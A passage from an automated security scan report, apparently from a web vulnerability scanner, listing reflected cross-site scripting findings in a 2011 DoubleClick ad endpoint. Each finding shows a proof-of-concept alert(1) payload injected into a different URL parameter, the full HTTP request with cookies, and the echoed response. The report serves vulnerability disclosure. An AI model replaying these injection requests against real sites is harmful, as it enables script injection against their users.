The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e24"-alert(1)-"07f6af6c04b was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=22e24"-alert(1)-"07f6af6c04b&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:45:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=22e24"-alert(1)-"07f6af6c04b&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallow
...[SNIP]...

3.286. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2abc"-alert(1)-"1f1d078926c was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=b2abc"-alert(1)-"1f1d078926c&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=b2abc"-alert(1)-"1f1d078926c&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www
...[SNIP]...

3.287. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b414a"-alert(1)-"6ba48982fe4 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100b414a"-alert(1)-"6ba48982fe4&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100b414a"-alert(1)-"6ba48982fe4&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.co
...[SNIP]...

3.288. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b9"-alert(1)-"eff1aa473e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=b53b9"-alert(1)-"eff1aa473e&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:44:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6523



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=b53b9"-alert(1)-"eff1aa473e&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagF
...[SNIP]...

3.289. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a588"-alert(1)-"0710fb18713 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=20009a588"-alert(1)-"0710fb18713&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=20009a588"-alert(1)-"0710fb18713&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/h
...[SNIP]...

3.290. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0478"-alert(1)-"ac1775bc225 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243d0478"-alert(1)-"ac1775bc225&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:45:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243d0478"-alert(1)-"ac1775bc225&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dca
...[SNIP]...

3.291. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcaf2"-alert(1)-"a1b0ec2d26a was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871fcaf2"-alert(1)-"a1b0ec2d26a&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:43:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
7-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871fcaf2"-alert(1)-"a1b0ec2d26a&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_1737753426
...[SNIP]...

3.292. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75677"-alert(1)-"059a0b0bfde was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=51152575677"-alert(1)-"059a0b0bfde&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=51152575677"-alert(1)-"059a0b0bfde&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.
...[SNIP]...

3.293. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 921da"-alert(1)-"2b438c71b84 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189921da"-alert(1)-"2b438c71b84&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189921da"-alert(1)-"2b438c71b84&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&ev
...[SNIP]...

3.294. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 274ae"-alert(1)-"d1dc0213438 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206274ae"-alert(1)-"d1dc0213438&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206274ae"-alert(1)-"d1dc0213438&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&coun
...[SNIP]...

3.295. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34bb2"-alert(1)-"0a311c663df was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.0334bb2"-alert(1)-"0a311c663df&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:45:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.0334bb2"-alert(1)-"0a311c663df&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never"
...[SNIP]...

3.296. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
